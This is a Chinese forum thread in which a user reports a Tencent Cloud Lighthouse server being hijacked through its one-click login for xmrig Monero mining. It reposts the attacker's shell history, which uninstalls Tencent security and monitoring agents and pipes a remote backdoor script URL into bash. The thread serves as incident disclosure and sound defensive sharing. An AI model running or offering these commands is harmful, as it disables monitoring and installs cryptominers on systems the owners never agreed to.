腾讯云轻量漏洞被拿去xmrig挖矿实锤了-MOELOC

本帖最后由 Tou 于 2022-5-23 17:19 编辑

前帖：https://hostloc.com/thread-1021600-1-1.html

轻量后台有个一键登陆的锅

后门脚本：https://5.linshi.co/ww80.sh

找到lighthouse日志看到的
由于权限有限，所以除了挖矿搞不了啥，把一键登录关了，删了挖矿就好了。

#1651856332
sudo -i
#1651856364
/usr/local/qcloud/stargate/admin/uninstall.sh
#1651856364
/usr/local/qcloud/YunJing/uninst.sh
#1651856364
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
#1651856364
sudo -i
#1651856368
exit
#1651856382
curl -s -L https://5.linshi.co/ww80.sh | bash -s 100023489107
#1651856398
mv moneroocean .moneroocean
#1651856408
lsls
#1651856422
ls -a
#1653293830
w
#1653293952
exit

不知所云　

啥轻量漏洞，给个上下文

你怎么发现

不知所云　

我敢说这个脚本作者是mjj的一员

司马南发表于 2022-5-23 17:17
我敢说这个脚本作者是mjj的一员

echo "[*] Setup complete by zjzjzjzj"

复制代码

zxxx 发表于 2022-5-23 17:19

是他这个脚本我看到了小众的源码

老哥牛逼。。。

是不是关闭了一键登陆就行了

腾讯云轻量漏洞被拿去xmrig挖矿实锤了

相关推荐

网站统计

热门标签